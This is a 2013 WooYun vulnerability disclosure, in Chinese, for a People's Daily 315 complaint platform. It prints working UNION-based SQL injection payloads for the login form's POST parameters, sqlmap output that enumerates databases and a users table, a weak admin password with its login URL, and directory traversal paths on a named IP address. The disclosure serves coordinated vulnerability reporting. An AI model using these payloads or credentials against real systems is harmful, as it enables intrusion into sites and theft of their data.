当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040395

漏洞标题:人民网某315投诉平台多漏洞导致后台沦陷

相关厂商:人民网

漏洞作者: 霍大然

提交时间:2013-10-21 16:30

修复时间:2013-12-05 16:31

公开时间:2013-12-05 16:31

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-05: 细节向公众公开

简要描述:

看到有人提交的人民网的转到cncert了,也提交一个:人民网某315投诉平台多漏洞导致后台沦陷

详细说明:

网站地址:
http://219.141.222.104/

1-1.PNG


1-2.PNG


一、sql注入(POST)
http://219.141.222.104:80/interface/select/data_lgi.php (POST)
password=e&username=admin
Place: POST
Parameter: password
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: password=e' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7175686371,0x6655765a7a426f664b68,0x71636d7971),NULL,NULL,NULL,NULL,NULL#&username=admin
Place: POST
Parameter: username
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: password=e&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7175686371,0x4d69787955656a4f7063,0x71636d7971),NULL,NULL,NULL,NULL,NULL#
---
web application technology: PHP 5.3.16, Apache 2.0.64
back-end DBMS: MySQL 5
available databases [7]:
[*] cmaol
[*] enginsite_addons
[*] information_schema
[*] koosa
[*] mysql
[*] oa
[*] travel2012
web application technology: PHP 5.3.16, Apache 2.0.64
back-end DBMS: MySQL 5
Database: oa
[7 tables]
+---------+
| child |
| grand |
| node |
| object |
| options |
| pros |
| users |
+---------+
web application technology: PHP 5.3.16, Apache 2.0.64
back-end DBMS: MySQL 5
Database: oa
Table: users
[4 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| id | int(11) |
| name | varchar(255) |
| pwd | varchar(255) |
| type | int(11) |
+--------+--------------+
数据不贴了,都是弱口令,可以登录。
二、弱口令
登录页面:
http://219.141.222.104/admin/login.html
admin/123456

1-3.PNG


可处理各种投诉,真想把张家界的那个什么金凤凰旅行社处理下(被他们那个毛导坑死了了)。
三、目录遍历
各种遍历
http://219.141.222.104/admin
http://219.141.222.104/interface/
……

漏洞证明:

1-3.PNG

修复方案:

1、参数过滤;
2、强口令;
3、禁止遍历;

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-25 22:46

厂商回复:

CNVD 确认并复现所述情况,已经转由CNCERT向新闻行业主管部门通报,由其后续联系网站管理方处置。
rank 15

最新状态:

暂无


漏洞评价:

评论